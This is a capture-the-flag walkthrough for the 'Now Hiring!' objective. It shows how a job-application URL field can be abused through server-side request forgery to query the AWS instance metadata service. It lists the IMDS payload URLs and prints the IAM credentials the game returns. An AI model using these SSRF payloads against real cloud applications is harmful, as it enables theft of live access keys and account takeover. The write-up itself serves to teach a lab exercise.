10) Now Hiring!

Details

  • Objective Link 1: Link
  • github files: Link

The terminal challenge for this objective is "IMDS Exploration", offered by Noxious O. D'or. Solving this terminal challenge provides additional hints for this objective. To view the hints, use the menu on the left.

To start this objective, click on the Jack Frost Tower job applications server in the objective menu.

Click Apply on the main page to reach the application page. The Apply page has a field called "URL to your public NLBI report". This field is vulnerable to server-side request forgery (SSRF). Put an AWS IMDS query in this field: the server runs the query and returns the result in a jpeg file.

The first IMDS query to send is http://169.254.169.254/latest/meta-data/. Put this URL in the above field, add a name to the name field and submit the application.

The server will return the results in a jpeg file. This file can be viewed in the Firefox Developer Tools under Network.

Opening this jpeg file reveals the response from the server.

From the above results we can see that credentials are available for jf-deploy-role. Let's request the credentials via the IMDS query http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role.

The server returns the following results in the jpeg file:

    {
    "Code": "Success",
    "LastUpdated": "2021-05-02T18:50:40Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
    "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
    "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
    "Expiration": "2026-05-02T18:50:40Z"
    }

Answer

CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX